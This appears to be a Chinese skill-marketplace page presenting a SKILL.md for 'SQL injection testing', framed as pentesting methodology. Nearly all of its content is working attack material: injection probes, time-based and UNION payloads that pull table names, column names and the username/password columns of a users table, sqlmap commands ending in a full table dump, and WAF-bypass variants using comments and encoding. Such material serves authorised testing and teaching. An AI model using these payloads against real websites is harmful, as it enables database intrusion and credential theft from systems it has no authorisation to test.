在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用sql-injection-testing
星标4,897
分支795
更新时间2026年1月15日 14:00
SQL注入测试的专业技能和方法论
安装
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
SKILL.md
readonly菜单
SQL注入测试的专业技能和方法论
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
满配示例技能包:SKILL.md + scripts/、references/、assets/ 等可选目录;验证 Eino skill 与 HTTP 包内路径(仅授权安全测试与教学)。
API安全测试的专业技能和方法论
业务逻辑漏洞测试的专业技能和方法论
云安全审计的专业技能和方法论
命令注入漏洞测试的专业技能和方法论
容器安全测试的专业技能和方法论
| name | sql-injection-testing |
| description | SQL注入测试的专业技能和方法论 |
| version | 1.0.0 |
SQL注入是一种常见且危险的Web应用漏洞。本技能提供了系统化的SQL注入测试方法、检测技术和利用策略。
' - 查看是否出现SQL错误' AND '1'='1 vs ' AND '1'='2' AND SLEEP(5)--' UNION SELECT NULL--' AND @@version LIKE '%mysql%'--' AND version() LIKE '%PostgreSQL%'--' AND @@version LIKE '%Microsoft%'--' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--' UNION SELECT database()--' UNION SELECT table_name FROM information_schema.tables--' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--' UNION SELECT username,password FROM users--# 基础扫描
sqlmap -u "http://target.com/page?id=1"
# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST
# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs
# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
/**/, --, #SeLeCt, UnIoN/**/, +, %09(Tab), %0A(换行)原始:' UNION SELECT NULL--
绕过1:'/**/UNION/**/SELECT/**/NULL--
绕过2:'%55nion%20select%20null--
绕过3:'/*!UNION*//*!SELECT*/null--